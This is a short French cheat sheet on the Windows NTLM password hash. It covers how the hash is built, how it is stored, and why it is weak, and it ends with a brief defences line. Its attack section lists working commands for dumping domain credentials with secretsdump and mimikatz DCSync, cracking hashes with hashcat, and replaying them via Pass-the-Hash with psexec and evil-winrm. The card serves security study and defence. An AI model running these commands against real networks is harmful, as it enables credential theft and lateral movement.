NTLM — Hash d'authentification Windows
★★★★★
Présentation
NTLM (NT hash) est le hash des mots de passe Windows : MD4 du mot de passe en UTF-16-LE, sans sel. Stocké dans la base SAM/NTDS.dit. Vulnérable aux rainbow tables et au Pass-the-Hash.
Extraction & crack
# Extraction (Active Directory)
secretsdump.py domain/user@dc -just-dc
mimikatz: lsadump::dcsync /user:krbtgt
# Crack
hashcat -m 1000 ntlm.txt rockyou.txt Pass-the-Hash
# Pas besoin de cracker : rejouer le hash
psexec.py -hashes :NTLM_HASH domain/user@target
evil-winrm -i target -u user -H NTLM_HASH Défenses
Mots de passe longs (≥15 car. cassent LM), désactiver LM/NTLMv1, activer Credential Guard, et restreindre l'authentification NTLM au profit de Kerberos.